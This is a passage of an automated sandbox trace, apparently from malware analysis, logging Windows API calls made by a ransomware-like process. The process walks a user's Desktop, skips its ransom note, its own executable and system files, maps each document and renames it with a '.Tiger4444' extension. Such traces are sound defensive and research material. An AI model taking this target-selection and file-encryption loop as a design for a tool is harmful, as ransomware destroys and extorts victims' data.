(lpString1="aGhyAFRoo.odp", lpString2=".") returned 1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="..") returned 1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="windows") returned -1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="bootmgr") returned -1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="pagefile.sys") returned -1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="boot") returned -1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="ids.txt") returned -1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="NTUSER.DAT") returned -1 [0049.488] lstrcpyW (in: lpString1=0x30aead8, lpString2="aGhyAFRoo.odp" | out: lpString1="aGhyAFRoo.odp") returned="aGhyAFRoo.odp" [0049.488] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aGhyAFRoo.odp", dwFileAttributes=0x0) returned 1 [0049.488] lstrlenW (lpString="aGhyAFRoo.odp") returned 13 [0049.488] lstrlenW (lpString="Tiger4444") returned 9 [0049.488] lstrcmpiW (lpString1="AFRoo.odp", lpString2="Tiger4444") returned -1 [0049.488] lstrlenW (lpString=".dll") returned 4 [0049.488] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0049.488] lstrlenW (lpString=".lnk") returned 4 [0049.488] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0049.488] lstrlenW (lpString=".ini") returned 4 [0049.488] lstrcmpiW (lpString1=".odp", lpString2=".ini") returned 1 [0049.488] lstrlenW (lpString=".sys") returned 4 [0049.488] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0049.488] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aGhyAFRoo.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\aghyafroo.odp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.488] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.488] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14094148869) returned 1 [0049.488] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=32069) returned 1 [0049.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0049.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0049.489] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8050, lpName=0x0) returned 0x2c8 [0049.489] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8050) returned 0xbe0000 [0049.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0049.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0049.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.490] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14094338123) returned 1 [0049.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0049.490] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0049.490] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.491] CloseHandle (hObject=0x2c8) returned 1 [0049.491] CloseHandle (hObject=0x260) returned 1 [0049.491] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\aGhyAFRoo.odp.Tiger4444") returned 47 [0049.491] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\aGhyAFRoo.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\aghyafroo.odp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\aGhyAFRoo.odp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\aghyafroo.odp.tiger4444"), dwFlags=0x1) returned 1 [0049.492] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5254f00, ftCreationTime.dwHighDateTime=0x1d4d468, ftLastAccessTime.dwLowDateTime=0xb3b23190, ftLastAccessTime.dwHighDateTime=0x1d4cb7c, ftLastWriteTime.dwLowDateTime=0xb3b23190, ftLastWriteTime.dwHighDateTime=0x1d4cb7c, nFileSizeHigh=0x0, nFileSizeLow=0x557c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aY_fyEf.bmp", cAlternateFileName="")) returned 1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="Tiger4444.exe") returned -1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2=".") returned 1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="..") returned 1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="windows") returned -1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="bootmgr") returned -1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="pagefile.sys") returned -1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="boot") returned -1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="ids.txt") returned -1 [0049.492] lstrcmpiW (lpString1="aY_fyEf.bmp", lpString2="NTUSER.DAT") returned -1 [0049.492] lstrcpyW (in: lpString1=0x30aead8, lpString2="aY_fyEf.bmp" | out: lpString1="aY_fyEf.bmp") returned="aY_fyEf.bmp" [0049.492] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aY_fyEf.bmp", dwFileAttributes=0x0) returned 1 [0049.492] lstrlenW (lpString="aY_fyEf.bmp") returned 11 [0049.492] lstrlenW (lpString="Tiger4444") returned 9 [0049.492] lstrcmpiW (lpString1="_fyEf.bmp", lpString2="Tiger4444") returned -1 [0049.492] lstrlenW (lpString=".dll") returned 4 [0049.492] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0049.492] lstrlenW (lpString=".lnk") returned 4 [0049.492] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0049.492] lstrlenW (lpString=".ini") returned 4 [0049.492] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0049.492] lstrlenW (lpString=".sys") returned 4 [0049.492] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0049.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aY_fyEf.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ay_fyef.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.493] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.493] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14094574772) returned 1 [0049.493] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=21884) returned 1 [0049.493] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0049.493] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0049.493] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5880, lpName=0x0) returned 0x2c8 [0049.493] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5880) returned 0xbe0000 [0049.493] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.493] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.494] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.494] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.494] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14094698477) returned 1 [0049.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0049.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0049.494] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.494] CloseHandle (hObject=0x2c8) returned 1 [0049.494] CloseHandle (hObject=0x260) returned 1 [0049.495] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\aY_fyEf.bmp.Tiger4444") returned 45 [0049.495] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\aY_fyEf.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ay_fyef.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\aY_fyEf.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ay_fyef.bmp.tiger4444"), dwFlags=0x1) returned 1 [0049.495] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd831bd70, ftCreationTime.dwHighDateTime=0x1d4cec3, ftLastAccessTime.dwLowDateTime=0x723bd490, ftLastAccessTime.dwHighDateTime=0x1d4d18b, ftLastWriteTime.dwLowDateTime=0x723bd490, ftLastWriteTime.dwHighDateTime=0x1d4d18b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cFnKWi", cAlternateFileName="")) returned 1 [0049.495] lstrcmpiW (lpString1="cFnKWi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="Tiger4444.exe") returned -1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2=".") returned 1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="..") returned 1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="windows") returned -1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="bootmgr") returned 1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="pagefile.sys") returned -1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="boot") returned 1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="ids.txt") returned -1 [0049.496] lstrcmpiW (lpString1="cFnKWi", lpString2="NTUSER.DAT") returned -1 [0049.496] lstrcpyW (in: lpString1=0x30aead8, lpString2="cFnKWi" | out: lpString1="cFnKWi") returned="cFnKWi" [0049.496] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0049.496] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3e) returned 0xc821d8 [0049.496] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc664e8 [0049.496] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba298060, ftCreationTime.dwHighDateTime=0x1d4caf4, ftLastAccessTime.dwLowDateTime=0x8a933900, ftLastAccessTime.dwHighDateTime=0x1d4c95e, ftLastWriteTime.dwLowDateTime=0x8a933900, ftLastWriteTime.dwHighDateTime=0x1d4c95e, nFileSizeHigh=0x0, nFileSizeLow=0x11d94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dbdfuzst6PZ_.m4a", cAlternateFileName="DBDFUZ~1.M4A")) returned 1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="Tiger4444.exe") returned -1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2=".") returned 1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="..") returned 1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="windows") returned -1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="bootmgr") returned 1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="pagefile.sys") returned -1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="boot") returned 1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="ids.txt") returned -1 [0049.496] lstrcmpiW (lpString1="Dbdfuzst6PZ_.m4a", lpString2="NTUSER.DAT") returned -1 [0049.496] lstrcpyW (in: lpString1=0x30aead8, lpString2="Dbdfuzst6PZ_.m4a" | out: lpString1="Dbdfuzst6PZ_.m4a") returned="Dbdfuzst6PZ_.m4a" [0049.496] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Dbdfuzst6PZ_.m4a", dwFileAttributes=0x0) returned 1 [0049.496] lstrlenW (lpString="Dbdfuzst6PZ_.m4a") returned 16 [0049.496] lstrlenW (lpString="Tiger4444") returned 9 [0049.496] lstrcmpiW (lpString1="t6PZ_.m4a", lpString2="Tiger4444") returned -1 [0049.496] lstrlenW (lpString=".dll") returned 4 [0049.496] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.496] lstrlenW (lpString=".lnk") returned 4 [0049.496] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.496] lstrlenW (lpString=".ini") returned 4 [0049.496] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.497] lstrlenW (lpString=".sys") returned 4 [0049.497] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Dbdfuzst6PZ_.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\dbdfuzst6pz_.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.497] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.497] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14094982127) returned 1 [0049.497] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=73108) returned 1 [0049.497] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0049.497] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0049.497] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x120a0, lpName=0x0) returned 0x2c8 [0049.497] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x120a0) returned 0xbe0000 [0049.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0049.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0049.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.499] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14095217557) returned 1 [0049.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0049.499] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0049.499] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.500] CloseHandle (hObject=0x2c8) returned 1 [0049.500] CloseHandle (hObject=0x260) returned 1 [0049.500] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\Dbdfuzst6PZ_.m4a.Tiger4444") returned 50 [0049.500] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Dbdfuzst6PZ_.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\dbdfuzst6pz_.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Dbdfuzst6PZ_.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\dbdfuzst6pz_.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.501] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.501] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.501] lstrcpyW (in: lpString1=0x30aead8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.501] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", dwFileAttributes=0x22) returned 1 [0049.501] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", dwFileAttributes=0x6) returned 1 [0049.501] lstrlenW (lpString="desktop.ini") returned 11 [0049.501] lstrlenW (lpString="Tiger4444") returned 9 [0049.501] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0049.501] lstrlenW (lpString=".dll") returned 4 [0049.501] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.501] lstrlenW (lpString=".lnk") returned 4 [0049.501] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.501] lstrlenW (lpString=".ini") returned 4 [0049.502] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.502] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cff7f0, ftCreationTime.dwHighDateTime=0x1d4ccd8, ftLastAccessTime.dwLowDateTime=0xb09a0840, ftLastAccessTime.dwHighDateTime=0x1d4cad0, ftLastWriteTime.dwLowDateTime=0xb09a0840, ftLastWriteTime.dwHighDateTime=0x1d4cad0, nFileSizeHigh=0x0, nFileSizeLow=0x1298, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dfisfgfVOG.pptx", cAlternateFileName="DFISFG~1.PPT")) returned 1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="Tiger4444.exe") returned -1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2=".") returned 1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="..") returned 1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="windows") returned -1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="bootmgr") returned 1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="pagefile.sys") returned -1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="boot") returned 1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="ids.txt") returned -1 [0049.502] lstrcmpiW (lpString1="dfisfgfVOG.pptx", lpString2="NTUSER.DAT") returned -1 [0049.502] lstrcpyW (in: lpString1=0x30aead8, lpString2="dfisfgfVOG.pptx" | out: lpString1="dfisfgfVOG.pptx") returned="dfisfgfVOG.pptx" [0049.502] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\dfisfgfVOG.pptx", dwFileAttributes=0x0) returned 1 [0049.502] lstrlenW (lpString="dfisfgfVOG.pptx") returned 15 [0049.502] lstrlenW (lpString="Tiger4444") returned 9 [0049.502] lstrcmpiW (lpString1="fVOG.pptx", lpString2="Tiger4444") returned -1 [0049.502] lstrlenW (lpString=".dll") returned 4 [0049.502] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0049.502] lstrlenW (lpString=".lnk") returned 4 [0049.502] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0049.502] lstrlenW (lpString=".ini") returned 4 [0049.502] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0049.502] lstrlenW (lpString=".sys") returned 4 [0049.502] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0049.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\dfisfgfVOG.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\dfisfgfvog.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.502] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.502] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14095550458) returned 1 [0049.502] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=4760) returned 1 [0049.502] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0049.503] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0049.503] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15a0, lpName=0x0) returned 0x2c8 [0049.503] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15a0) returned 0xbe0000 [0049.503] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.503] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0049.503] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.503] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.503] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.503] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.503] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.503] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0049.503] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14095653941) returned 1 [0049.503] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0049.504] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0049.504] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.504] CloseHandle (hObject=0x2c8) returned 1 [0049.504] CloseHandle (hObject=0x260) returned 1 [0049.504] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\dfisfgfVOG.pptx.Tiger4444") returned 49 [0049.504] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\dfisfgfVOG.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\dfisfgfvog.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\dfisfgfVOG.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\dfisfgfvog.pptx.tiger4444"), dwFlags=0x1) returned 1 [0049.505] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1829650, ftCreationTime.dwHighDateTime=0x1d4cd22, ftLastAccessTime.dwLowDateTime=0xd6e21b60, ftLastAccessTime.dwHighDateTime=0x1d4d286, ftLastWriteTime.dwLowDateTime=0xd6e21b60, ftLastWriteTime.dwHighDateTime=0x1d4d286, nFileSizeHigh=0x0, nFileSizeLow=0x165d5, 